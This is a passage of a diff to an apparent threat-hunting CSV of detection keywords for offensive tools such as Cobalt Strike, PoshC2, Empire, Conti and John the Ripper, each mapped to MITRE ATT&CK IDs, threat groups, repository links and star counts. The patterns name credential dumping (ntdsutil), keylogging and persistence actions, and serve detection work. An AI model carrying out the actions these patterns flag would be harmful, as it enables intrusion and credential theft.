","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" -"*staroffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*staroffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Start Menu\Programs\Startup\Loader.exe*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is 
created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*start PsExec.exe -d *","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*start stinger ","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*start_mythic_server.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*start_nbnsspoof*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*start_mythic_server.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*start_nbnsspoof*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. 
Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*Start-ACLsAnalysis -Domain*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" -"*startanotherimplant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Start-CaptureServer.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*startdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*startanotherimplant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Start-CaptureServer.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*startdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Start-domainACLsAnalysis*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*starting Multi-Layered ACLight scan*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*-start-keylogger*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" 
-"*start-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*start-keystrokes-writefile*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Start-MonitorTCPConnections.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*start-process ntdsutil.exe *create full**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*start-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*start-keystrokes-writefile*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Start-MonitorTCPConnections.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*start-process ntdsutil.exe *create full**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
"*StartProcessFake(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*Start-PSAmsiClient.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" 
"*Start-PSAmsiServer.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"*Start-TCPMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Start-MonitorTCPConnections.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*Start-TCPMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Start-MonitorTCPConnections.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*startupfolderperistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. 
a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*Start-WebServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*StartWebServiceBeacon*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" 
@@ -17383,77 +17566,77 @@ "*static_syscalls_apc_spawn*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*static_syscalls_dump*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*statistically-likely-usernames*","offensive_tool_keyword","statistically-likely-usernames","This resource contains wordlists for creating statistically likely usernames for use in username-enumeration. simulated password-attacks and other security testing tasks.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/insidetrust/statistically-likely-usernames","1","1","N/A","N/A","7","699","112","2022-08-31T20:27:53Z","2016-02-14T23:24:39Z" -"*StayKit.cna*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging 